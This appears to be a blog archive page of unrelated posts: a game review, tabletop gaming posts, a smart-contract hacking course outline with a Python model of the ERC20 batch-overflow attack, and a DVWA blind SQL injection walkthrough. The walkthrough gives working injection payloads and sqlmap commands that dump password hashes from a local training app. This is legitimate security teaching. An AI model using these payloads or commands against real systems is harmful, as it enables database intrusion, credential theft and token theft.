Tuesday, 22 September 2020

Know These Traffic Rules And Challan Rules In India

 Indian Traffic Rules And Challan Rules



Hi friends, please read these traffic rules and challan rules in India so you can reduce the risk of a fine.

Click Here For Full Details Of Traffic Rules And Challan Rules In India


Credits - Shivanshu Sharma And Sudhanshu Sharma

Monday, 21 September 2020

Heroes Of Hammerwatch - Ultimate Edition Review (NSW)

Written by Patrick Orquia


Title: Heroes of Hammerwatch - Ultimate Edition
Developer: Crackshell
Publisher: Blitworks
Genre: Action Adventure, RPG, Roguelite
Number of Players: 1
Platform: Nintendo Switch
Release Date: July 29, 2020
Price: $19.99



I like roguelike/roguelite games, even though they incite violent rage in me when I play them. Ok, no, not violent. I just cuss a lot and maybe scream loud enough for the people next door to call the cops on me. As frustrating as these games could be, there is one thing that is for sure: they are very fun to play, because they make me continuously get better at the game by learning from my past mistakes bit by bit and force me to try new strategies to keep me from dying over and over again.




Heroes of Hammerwatch is a roguelite RPG game, wherein you play as a warrior who has to explore dungeons to accumulate money and ores to rebuild the town of Outlook. As expected with roguelite games, you will die a lot of times in the process. This game is very punishing early on and the gameplay gets very repetitive very fast, but if you have the tendency to get addicted to the risk-reward cycle of games such as this, you could end up spending hours upon hours trying to level up and earn money and other rewards.

At the start of the game, you get to choose which warrior class you want your character to be and customize its looks to your liking. The game has 16-bit aesthetics, and your character and the rest of the visuals will look pixelated, but still, you get to create it and see how the game will show it in all of its pixel-y goodness. You can create multiple characters in a single save file, and they all share resources. This is a good game mechanic because it offers you multiple ways to tackle the challenges of the game, since different classes have different attack styles and skills. Plus you don't want to get stuck with just a paladin character. Maybe you would want a ranger or a wizard, too, depending on your mood.

The game is presented as a dungeon crawler, where your character has to battle hordes of enemies that will try to kill you in large numbers at first sight in large, procedurally-generated dungeons sectioned into rooms and corridors. There are two types of attacks: one is a normal attack, either melee or ranged, and the other is a skill, which uses mana points (MP). Additional skills get unlocked as you progress. You get experience points upon defeating these enemies. If you defeat enough enemies in quick succession without getting hit, you will enter a combo state that makes your character move faster and hit harder, and you could also generate HP and MP. Some of the rooms contain loot such as gold, food, and the elusive ores. These ores are used to unlock new establishments that provide permanent skill upgrades, temporary buffs, and other goodies.




At the beginning of the game, you start with the first dungeon, the mines. It is divided into four floors, with the last one containing a boss that you need to defeat to proceed to the next one. The bosses can be quite hard to beat, as they have a large HP pool plus waves of enemies also join the fray, so you have to keep on moving and keep on killing, or risk getting killed yourself. The other dungeons are presented the same way. If or when you die, you end up back in town, with all of your temporary abilities and unsaved gold/ores gone. This kind of stings, but it is typical for a roguelite game. But wait, you ask, unsaved gold/ores? Well, in this game, you are required to send the money you collect from the dungeons back to town. Some floors will have an elevator that goes back to town, where you can deposit the gold and ores you have collected so far. This will be your savings, minus some taxes. The game does not specifically explain this, and I personally wasted a few runs earning nothing because I didn't know that I had to do this. Not all floors have this, so the further you go without saving your money, the greater the risk you take, plus the louder you scream when you die.

By the way, this game implements a cool way of skipping floors to advance to dungeons that you have already visited: at the starting floor of the preceding dungeon, you can find a portal that leads to a challenge room, where you have to survive many waves of enemies in order to advance to the succeeding dungeon. The goal is to break a cube at the center of the room, and as long as it is intact, the waves of enemies don't stop. Surviving this room will reward you with 8 FREE temporary buffs that you can use for the rest of your run (they disappear when you die). Typically, buffs can be bought at a shop in the town or found in treasure chests and from NPCs inside the dungeons. These buffs add up and work alongside one another, so the more buffs you have equipped, the more of a fighting chance your character gets at surviving the dungeons.




The more you progress into the game, and hopefully you get more and more skilled in killing enemies and saving those precious coins and ores, the more you can build up the town. Town upgrades require a certain amount of ores, so yes, you will really spend hours upon hours grinding in the dungeons to upgrade them. But if you do manage to upgrade the establishments, you will reap the benefits, because you can then have more options to upgrade your character… for it to be more capable of killing more enemies and collecting loot and goodies. Rinse and repeat.

To somehow break the monotony of repetitive gameplay, you can try playing with other people, either locally or online. The local multiplayer is fun and makes traversing dungeons easier, since you get to share the load of killing the multitude of enemies, plus you get to share a high five with your friends every so often, or maybe yell at them if they die more than you do. The online multiplayer is a bit of a mixed bag, as trying to find parties to join or people to join your own party can be a bit hard. Maybe the game is not being played as much by other people on the Switch, which is quite a shame. This version of the game also comes with all the DLCs that have been available for the game so far (it has been out on other platforms for a couple of years now). The new areas still play basically the same, but with tougher challenges, which will really test your skills. Oh, and the game also has a New Game+, so really, your grinding and killing spree will not stop if you so choose.




Overall, Heroes of Hammerwatch – Ultimate Edition is a good game that has a lot to offer. It has cool visuals and aesthetics, with an equally cool soundtrack to wrap everything together. It has a steep learning curve, but once you get the hang of the gameplay, you'll soon find yourself being a very capable warrior that can go toe to toe against the toughest of enemies. So if you are aching for a good roguelite game, give this game a go and put your dungeon exploration skills to the test.




REPLAY VALUE: Very high




PROS

  • Cool visuals with 16-bit aesthetics
  • Catchy soundtrack to keep you moving as you explore the dungeons
  • Wide range of customization options to suit your play style
  • Wide variety of enemy types
  • Repetitive yet very addicting and enjoyable gameplay
  • Very challenging, with a steep learning curve at the beginning, but very rewarding as you progress further into the game
  • Has a surprisingly good amount of content
  • Has local and online multiplayer options


CONS

  • Characters look very tiny, especially in handheld mode
  • Looks very dark in handheld mode, which makes it even harder to differentiate enemies and traps
  • Very grind-heavy
  • Some dungeon floors don't have the elevator for saving gold and ores, which results in high frustration when you die because you lose everything unsaved
  • Frame rate drops are encountered when there is too much action happening on screen
  • Can be hard to find online parties to join or players to join your own party



RATING: 4/5 Hammerwatch heroes and villains

Saturday, 12 September 2020

And I'm Still Losing...

What's going on everyone!?


Today for the #2019gameaday challenge my lovely wife, beautiful daughter and I played a game of Hero Realms with the Wizard, Thief and Ranger expansions. 


Unfortunately, I still can't post pictures unless they're screenshots because there is an error with the Blogger app, but rest assured I really did lose, lol!


Trinity ended up killing me and doing a great job as usual but this time Sam ended up finishing her off before she could regain any health and take her mother out as well.


As always, thank you for reading and don't forget to stop and smell the meeples! :)

-Tim

28Mm Crusades Command Bases



A quick show off post today of some new command bases for my 28mm Crusades Project. These figures are from 1st Corps / Curtneys Miniatures and I picked them up from the York show a couple of years back.


I am always really slack when it comes to Command Stands and end up with armies hundreds of figures strong with no commanders, so to get four (The other one will be in the Kingdom of Jerusalem force review later in the week) done at this stage of the Army build is pretty remarkable.



Base number one is based on my Red Knights unit (a later Hospitaller unit) and consists of a musician and standard bearer, flags are from Flags of War.



Second base is for my St Lazarus Knights, those of you who are familiar with the blog may notice that my choice of command stands is based around left over decals from previous units, not that I'm tight or anything 😁

The commander figures are basically the same but with different head and weapon options; this one has a bishop-type head and a mace.



So there we have three command bases ready for our next Crusades game, whenever that will be. Kingdom of Jerusalem and end-of-project shots coming next.


Thursday, 3 September 2020

Inspiration Strikes - Handling Poison

Ch-click! The stone surface depressed slightly underneath the halfling's foot. Just as that fact made itself known to the footpad's mind, a row of small needles sprang from the floor, piercing the boot and puncturing Lightfinger's foot! 

"OWWWW!" he cried as he backed up. "Something got me!"

Then... he felt a wave of nausea sweep over him. Bile rose in his throat as his limbs felt weak.

"Guys... I don't feel so good..."


Poison is one of those topics that every DM has thought about. Sean over at TheCampaign20xx blog has a great summary of D&D's published poison rules across the editions.

I'm a fan of things giving players pause. I remember the look on my player's face when he had to save vs. Death because of poison from a Chaos creature - this was a 4th level paladin! There had been plenty of foreshadowing about these creatures, but the frisson of the moment was palpable to all eight of us at the table! (He used the d30 rule [1] and survived.)

We play to live, knowing that we can die... but dying from the poison of a 10-year-old trap or a Giant Centipede? There are times when I want something different.

Thus, when Lightfingers hit a trap during a recent delve into the infamous Quasqueton dungeon, and failed his save, I thought about what the result should be. Death, lots of laughter, and a quick set of six 3d6 rolls? Or do something more fun, giving this character a different fate?

I opted for the latter. RAW OD&D (as per the original 3 books) has an interesting bit regarding Constitution (pg 11) - "Constitution 13 or 14: Will withstand adversity. Constitution 9 - 12: 60% to 90% chance of surviving. Constitution 8 or 7: 40% to 50% chance of survival"

Oho! This poison trap gave me a chance to use that bit. I rolled to see when the poison's effect would require him to test his "chance of survival" (i.e., a system shock!) and it was 6 turns. During that time, his move dropped to 3", and he was at -4 for melee/missiles/saves.

At 6 turns, he failed his "chance of survival" check and took a d6 of damage from the poison. Another d6 said he had to check again in 4 turns. He was still at his "poisoned" penalties. After those 4 turns, he rolled his check. He was no longer sick, but the hp loss remained, subject to any healing that might be found in the dungeon.

For my game, this was more fun and generated quite a bit more caution from the PCs. They had the chance of somehow finding something to help Lightfingers, or hoping that he recovered, or wondering if he would die. I wanted that kind of game more than "BLAM, you're dead, reroll" (though those games are absolutely appropriate and great fun!).

From that bit of in-game inspiration, I came up with this sort of approach for future use:

Alternative Poison Rule

For poisons of creatures of less than 2HD, for many contact poisons and some (weak) ingested poisons, make a save vs. poison. If they fail:

  1. Victim is penalized -4 on melee/missile to-hits and other saving throws.
  2. A d6 determines how many turns elapse before the PC must make a "Constitution survival (system shock) check". (OD&D: CON of 6 or less, AD&D: Con of 5 or less: 0% chance).  If the PC has a 13+ con (OD&D), or 15+ con (AD&D), the effects wear off after this initial period of illness with no hp loss or further penalty.
  3. A failed survival check means the poison does d6(OD&D) or one half of  2 to 4d10(AD&D, DMG pg 20 lays out the different classes of poison) hp damage. Another d6 is thrown to see how many turns elapse before the next check.
  4. A successful check means that the victim is able to withstand the effects of the poison and no longer suffers from the penalties or damaging effects. Any lingering effects are up to the DM!
  5. Poison hp loss may be cured at anytime, even while the victim is sick, but said curing does not remove the effects of poison! Only antitoxin/antivenom, or some magical means that removes poison, will heal the victim of the poison's effects.

For creatures of 2+HD or virulent/strong poisons, the "save or die" rule applies, unless other effects are noted for the poison.

For me, this is a nice little subsystem that uses Constitution and hp in ways that make sense to me. It is possible that one may indeed die from poison, but at least there is a 1 to 6 turn window during which they desperately search for a means of survival. It might not necessarily be "simple", but it's something I could play now and again, for a bit of variety in how poisons work.

Game on!

[1] The d30 Rule:  If, in the perilous moment of fate and before the hand of the GM hath cast the selected dice, thou wishest to chance thy fate on the great black and red d30, thou mayest do so. Thee must declare thine wishes prior to the cast of fates. Once the d30 hast been cast, thou must live with thine fate as decreed. Only once per game may thou chooseth the d30. Thou are prevented from using the d30 to determine thy starting or additional hit points.

Sunday, 30 August 2020

Blockchain Decentralized Application Hacking Course - A Journey Into Smart Contract Hacking And DApp Penetration Testing (Web 3.0)


Smart Contract Exploitation and Hacking Course Announcement


What Is this: 

For those who have been hitting me up on Twitter and YouTube for more blockchain smart contract exploitation content, this blog is for you. I have posted a video below explaining what this is and included a course outline of the content we are providing free for everyone. I was actually told recently that I am crazy for giving out this level of detailed content and training for free. However, I believe in the original hacker ethic from long ago, that information should be freely available for everyone! In this frame of mind, the only paid content will be for those who wish to go the extra mile: the person who wants to prove to themselves or others that they learned something, via a certification package with detailed exam prep targets and guides, followed by a final exam CTF and reporting write-up.

So I hope you enjoy this content. The content and walk-through labs will all be free. It will be posted regularly over the next few months; 90% of it is already written and ready to go.

We will start off with the differences between Solidity and other languages and do a quick coding overview before we start hacking. This way everyone is on the same page when we start looking at coding examples of vulnerable targets or reviewing case study code. Then we will cover a wide range of typical issues that affect decentralized applications (DApps) and smart contracts on the Ethereum blockchain: how to spot them and how to exploit them, with full walk-through style learning. Subjects we have already released (Re-Entrancy, Integer Attacks, Authorization) have been updated with new code, new examples, case studies, etc. Some of the learning content will be the same but with a lot of newly added material, and in the case of Authorization it has been completely re-written and expanded.

Basically, this course was created to get the information out there in a clear, concise way, because when I started researching blockchain hacking all I found was a paragraph here and there on something that was overly technical or completely theoretical. I couldn't find any clear, concise learning material or examples. This drove me nuts trying to figure everything out, until I gave up and just coded my own vulnerabilities and hacked them. So hopefully this fills the knowledge gap and offers a clear, concise, zero-fluff resource to those on the same path.


CTF Exam: 

If you do enjoy this series over the next few months and want to challenge your skills and certify that you learned something, we will also be offering a paid certification bundle that includes Decentralized Application (DApp) targets and detailed lab guides as preparation for a final exam against a more comprehensive CTF certification challenge target. More info on this as the months progress.


Bug Bounty of Sorts: 

These labs are completed, but we are working on a way to deliver the content, which requires me to code up course delivery software. So feel free to hack the course delivery software once it's up; if you break in or bypass authorization, I will give you the full course for free, provided you help me fix it. :P


Pre- Requisites: 

This is more of an intermediate/advanced course with a white-box code approach to bug hunting and a dynamic approach to application hacking and exploiting targets. With that said, you will need the following pre-requisites:

  • Ability to code in some language and understanding of coding concepts. 
  • Application hacking or development background with firm understanding of vulnerabilities


Contact Info:

As this is free, I only ask that you provide constructive feedback as we are creating other more advanced hacking courses on random subjects we are interested in. Most of which will be free.  And feedback helps us not do things which are not useful and integrate new ideas where they make sense.

Cheers and I hope this finds you well.

Email: 

  • info@cclabs.io


Course Outline / Release Order: 

Orange = What's included additionally for the full course

Blue = What will be released free in blogs / videos (mostly every Monday) over the next few months


Building and Scoping Things

    Chapter 1: Cliff Notes on Blockchain

        Intro:

        What is a Blockchain and how is it secured

        Smart Contracts

        What is a Decentralized Application (DApp)?

        Diving into Blockchain Components:

        Distributed Vs Decentralized

        Provenance Use Case:

        Consensus and Mining:

            Hands on Lab - Blockchain Consensus walkthrough Lab

        Summary:

        References:


    Chapter 2: Threat Modeling and Scoping Engagements

        Architecture Considerations:

        Business Logic Locations and Technology Decisions

        Development Environments

        Threat Modeling

        Summary

        References:


    Chapter 3 – Solidity for Penetration Testers Part 1 (Hello World)

        About Solidity

            Hands on Lab - Remix interface overview

        Structure of a Smart Contract

            Hands on Lab – HelloWorld

        Summary

        References:


    Chapter 4 – Solidity for Penetration Testers Part 2

        Beyond Hello World

            Hands on Lab – Code HelloWorld bank

        Code Level Walk Through of HelloWorld Bank

        Checks Effects Interactions:

        Summary


Part 2: Hacking and Exploiting Things

    Chapter 5 - Glass Half Full or Glass Half Empty: Integer Attacks

        Underflows and Overflows

        Withdraw Function Vulnerable to an underflow

        Transfer Function Vulnerable to a Batch Overflow

        Batch Overflow Code Explanation:

            ERC20 Batch Overflow Case-Study

            Walkthrough of The Vulnerable Function

            Reviewing the Real Attack Transaction

            Hands on Lab - Exploiting Our Own ERC20 Batch Overflow

            Hands on Lab - Fixing the ERC20 Overflow

            Exam Prep - DApp Target + Detailed Lab Guide

            Hands on Lab -Safe Math Walk Through

        Integer Attacks Summary

        Integer Attacks References
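The Chapter 5 outline names the ERC20 batch overflow case study and the SafeMath fix. As an added illustration (a Python model written for this page, not the course's Solidity lab code), the block below reproduces the arithmetic of the publicly documented `batchTransfer` pattern: in Solidity before 0.8, `uint256 amount = uint256(cnt) * _value` wraps modulo 2**256, so two receivers and `_value = 2**255` give `amount == 0`, the balance check passes with an empty wallet, and each receiver is still credited `2**255`. Address strings and balances are constructed; `attack_value` is a helper written here.

```python
"""Model of the ERC20 batchTransfer integer overflow (added example).

A Python model of the uint256 arithmetic, not the course's Solidity code.
The vulnerable and SafeMath-fixed versions differ only in the `mul` used
for `amount = cnt * value`, so both can be run against the same attack.
"""

UINT256_MOD = 2 ** 256


def u256_mul(a, b):
    """Unchecked multiplication: wraps modulo 2**256 like pre-0.8 Solidity."""
    return (a * b) % UINT256_MOD


def safe_mul(a, b):
    """SafeMath-style multiplication: revert (raise) instead of wrapping.
    Python ints never wrap, so the overflow test is simply c >= 2**256."""
    c = a * b
    if c >= UINT256_MOD:
        raise AssertionError("SafeMath: multiplication overflow")
    return c


class BatchToken:
    """Balance map plus the batchTransfer pattern from the public case study.
    `mul` is injected so the unchecked and checked variants can be compared."""

    def __init__(self, balances, mul):
        self.balances = dict(balances)   # constructed sample balances
        self.mul = mul

    def batch_transfer(self, sender, receivers, value):
        cnt = len(receivers)
        amount = self.mul(cnt, value)    # the line that overflows when unchecked
        if not (0 < cnt <= 20):
            raise AssertionError("require: bad receiver count")
        if not (value > 0 and self.balances.get(sender, 0) >= amount):
            raise AssertionError("require: insufficient balance")
        self.balances[sender] = self.balances.get(sender, 0) - amount
        for r in receivers:               # each receiver gets the full value
            self.balances[r] = self.balances.get(r, 0) + value
        return amount


def attack_value(cnt):
    """Helper (written here): the _value that makes cnt * _value wrap to
    exactly 0 mod 2**256. Requires a power-of-two receiver count."""
    if cnt & (cnt - 1):
        raise ValueError("use a power-of-two receiver count")
    return UINT256_MOD // cnt            # 2 receivers -> 2**255


def demo():
    """Run the attack against both variants; return (debited, minted, blocked)."""
    attacker, receivers = "0xattacker", ["0xreceiver_a", "0xreceiver_b"]
    value = attack_value(len(receivers))

    vuln = BatchToken({attacker: 0}, u256_mul)
    debited = vuln.batch_transfer(attacker, receivers, value)   # 0 deducted
    minted = vuln.balances["0xreceiver_a"]                      # 2**255 credited

    fixed = BatchToken({attacker: 0}, safe_mul)
    try:
        fixed.batch_transfer(attacker, receivers, value)
        blocked = False
    except AssertionError:
        blocked = True                                          # SafeMath reverts
    return debited, minted, blocked


if __name__ == "__main__":
    print(demo())
```

The checked variant still allows legitimate transfers; only the product that would exceed 2**256 is rejected, which is exactly what `SafeMath.mul` (or the built-in checked arithmetic of Solidity 0.8+) enforces.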

          

    Chapter 6 - You Again: Leveraging Reentrancy Attacks

        Reentrancy Intro

        Checks Effects Interactions Pattern

        Simple Reentrancy Example Code

        Passing the Checks:

        Looping the Interaction:

        Updating the Effects:

        Attacking Code Example:

            Hands on Lab - Attacking a Simple Reentrancy

            Hands on Lab - Fixing the Checks Effects interaction Pattern

        send vs transfer vs call.value

            Case Study – The Dao Hack

            Exam Prep - DApp Target + Detailed Lab Guide

        Reentrancy Summary

        Reentrancy References


    Chapter 7 - Do You Have a Hall Pass: Access Control Attacks

        Understanding Smart Contract Authorization and Visibility

        Visibility:

        Simple Visibility Example:

        Implementing Authorization:

        Example Walk-through of No Authorization

        Thinking about Smart Contracts as unpublished API's for DApps

            Case of the Video Game Heist

        Enumerating functions in a contract

            Hands on Lab - Directly Calling Public Functions with Web3

            Hands on Lab - Example Fix with Simple Authorization

        Exit Scam Warning

            Hands on Lab - Example Fix-2 Using Modifiers for Simple Authentication

            Hands on Lab - Example Using Openzeppelin for Role Based Access Control

            Exam Prep - DApp Target + Detailed Lab Guide

        Authorization Summary:

        Authorization References


    Chapter 8 - Dude Where's My Data: Storage Vs Memory Attacks

       Intro - Not Written Yet – Up Next

       Code Example -  Not Written Yet – Up Next

       Case study? - Not Written Yet – Up Next

       Exploiting vulnerability -  Not Written Yet – Up Next

       Summary -  Not Written Yet – Up Next

       References -  Not Written Yet – Up Next


    Chapter 9 - Do I Know You: tx.origin vs msg.sender Attacks

        What's the difference?

        Man In the Middle Via tx.origin

            Hands on Lab -  Simple tx.origin Example Walkthrough

            Hands on Lab -  Vulnerable TX.Origin Example Walkthrough

            Exam Prep - DApp Target + Detailed Lab Guide

        Action steps to familiarize yourself with the contract:

        Attack Options:

        Summary

        References


    Chapter 10 - Who Am I: Delegate Call Attacks

        How delegate calls work:

        Delegate Call vs Call

        Simple Delegate Call Example Code

        Simple Delegate Code Example Walkthrough

            Hands on Lab - Simple Delegate Example Walkthrough

        Variable Memory Issues with Delegate Calls

        DelegateCall Storage Simple Example Code

            Hands on Lab - DelegateCall Storage Walkthrough

            Exam Prep - DApp Target + Detailed Lab Guide

        Case Study - Parity Wallet Attack:

        Attack Transactions Explained

        Dangerous fallback function using delegatecall

        The Parity Wallet Code

        Delegate Chapter Summary

        Delegate References:


    Chapter 11 - Look into My Crystal Ball: Bad Randomness Issues

        Cryptographic Implementations and Predictable PRNGs

        Simple BlockHash Example

            Hands on Lab - BlockHash Vulnerability Walk and Talk

            Exam Prep - DApp Target + Detailed Lab Guide

        Preventing Randomness Issues

        Bad Randomness Summary

        Bad Randomness References


    Chapter 12 - Automated Static Application Security Testing

        Content - Not written - Up Next 

            Hands On Lab - Not written - Up Next 

        Summary Not written - Up Next 

        References - Not written - Up Next 


    Chapter 13 - CTF Exam

        Final Exam and CTF Certification Exam Target

        Final Exam Reporting


Appendices

    Appendix I – Pre-Requisite Suggestions:

        Programming Pre-Requisites:

        Web Application Hacking Pre-Requisites:

    Appendix II – Other Blockchain Learning Resources and Certifications

    Appendix III – Non-Exhaustive Scoping Questions

    Appendix IV – Non-Exhaustive List of things to check for




Learning Web Pentesting With DVWA Part 3: Blind SQL Injection

In this article we are going to do the SQL Injection (Blind) challenge of DVWA.
OWASP describes Blind SQL Injection as:
"Blind SQL (Structured Query Language) injection is a type of attack that asks the database true or false questions and determines the answer based on the application's response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal SQL injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible."
To follow along click on the SQL Injection (Blind) navigation link. You will be presented with a page like this:
Let's first try to enter a valid User ID to see what the response looks like. Enter 1 in the User ID field and click submit. The result should look like this:
Let's call this the valid response for ease of reference in the rest of the article. Now let's try to enter an invalid ID to see what the response for that would be. Enter something like 1337; the response would be like this:

We will call this the invalid response. Since we know both the valid and invalid response, let's try to attack the app now. We will again start with a single quote (') and see the response. The response we get back is the one we saw when we entered the wrong User ID. This indicates that our query is either invalid or incomplete (the page returns the same generic response for a SQL error and for a missing user, which is exactly why this is a blind injection). Let's try to add an or clause to our query like this:
' or 1=1-- -
This returns a valid response, which means our query is complete and executes without errors. Let's try to figure out the number of columns in the query output, like we did with the SQL injection before in Learning Web Pentesting With DVWA Part 2: SQL Injection.
Enter the following in the User ID field:
' or 1=1 order by 1-- -
Again we get a valid response; let's increase the number to 2.
' or 1=1 order by 2-- -
We get a valid response again; let's go for 3.
' or 1=1 order by 3-- -
We get an invalid response so that confirms the size of query columns (number of columns queried by the server SQL statement) is 2.
Let's try to get some data using the blind SQL injection, starting by trying to figure out the version of the DBMS used by the server, like this:
1' and substring(version(), 1,1) = 1-- -
Since we don't see any output, we have to extract data character by character. Here we are trying to guess the first character of the string returned by the version() function, which in my case is 1. You'll notice the page returns a valid response when we enter the query above in the input field.
Let's examine the query a bit to further understand what we are trying to accomplish. We know 1 is a valid user ID and returns a valid response, so we start with it. Following the 1, we use a single quote to close the string literal in the server's query. After the single quote we start to build our own condition with the and operator, which makes the whole WHERE clause true if and only if both conditions are true. Since user ID 1 exists, we know the first condition is true. In the second condition, we extract the first character of the version() string using the substring() function, compare it with 1, and then comment out the rest of the server's query. Since the first condition is true, if the second condition is true as well we will get a valid response back; otherwise we will get an invalid response. Since the version of MariaDB installed by the Docker container starts with a 1, we get a valid response. (Comparing a one-character string with the unquoted number 1 relies on MySQL/MariaDB's string-to-number coercion; comparing against the quoted string '1' is the explicit form and avoids surprises with non-digit characters.) Let's see if we get an invalid response if we compare the first character of the string returned by the version() function to 2, like this:
1' and substring(version(),1,1) = 2-- -
And we get the invalid response. To determine the second character of the string returned by the version() function, we ask for a substring of length 1 starting at position 2:
1' and substring(version(),2,1) = 1-- -
We get an invalid response. Changing 1 to 2, then 3 and so on, we keep getting an invalid response back; then we try 0 and get a valid response, indicating the second character of the version() string is 0. Thus we have got 10 so far as the first two characters of the database version. We could try to get the third and fourth characters of the string in the same way, but as you can guess it will be time consuming (up to one request per candidate character per position). So it's time to automate the boring stuff. We can automate this process in two ways. One is to use our awesome programming skills to write a program that will automate this whole thing. Another way is not to reinvent the wheel and use sqlmap. I am going to show you how to use sqlmap, but you can try the first method as well, as an exercise.
Let's use sqlmap to get data from the database. Enter 1 in the User ID field and click submit.
Then copy the URL from the URL bar which should look something like this
http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit
Now open a terminal and type this command:
sqlmap --version
This will print the version of your sqlmap installation; otherwise it will give an error indicating the package is not installed on your computer. If it's not installed, go ahead and install it.
Now type the following command to get the names of the databases:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id
Replace the PHPSESSID value with your own session ID: right-click the page, click Inspect (Firefox here), open the Storage tab and expand Cookies. The port of your DVWA instance may also differ, so adjust the URL accordingly.
In the command above, -u specifies the URL to attack, --cookie passes the authentication cookies so that sqlmap's requests stay inside your logged-in session (the security=low cookie is what keeps DVWA on the low-difficulty version of the page), and -p names the parameter to inject into. Since this page only ever answers true or false, --technique=B restricts sqlmap to boolean-based blind injection, and --batch accepts the default answer to every prompt if you do not want to be asked.
We will now list the tables of the dvwa database:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa --tables
After getting the list of tables, it's time to list the columns of the users table:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa -T users --columns
And at last we dump the password column of the users table:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa -T users -C password --dump
Now you can see the password hashes.
As you can see, automating this blind SQLi with sqlmap made it simple; doing the same by hand would have taken a lot of time. That is why both manual and automated testing are necessary in a pentest: relying on just one of the two is not a good idea, and we should leverage both so that we understand the vulnerability as well as exploit it.
By the way, we could have dumped every database and table in one go with this sqlmap command:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id --dump-all
But that is obviously time and resource consuming, so we extracted only what interested us rather than dumping everything.
We could also have used sqlmap on the plain SQL injection from the previous article. As an exercise, redo the SQL Injection challenge using sqlmap.

References:

1. Blind SQL Injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection
2. sqlmap: http://sqlmap.org/
3. MySQL SUBSTRING() Function: https://www.w3schools.com/sql/func_mysql_substring.asp
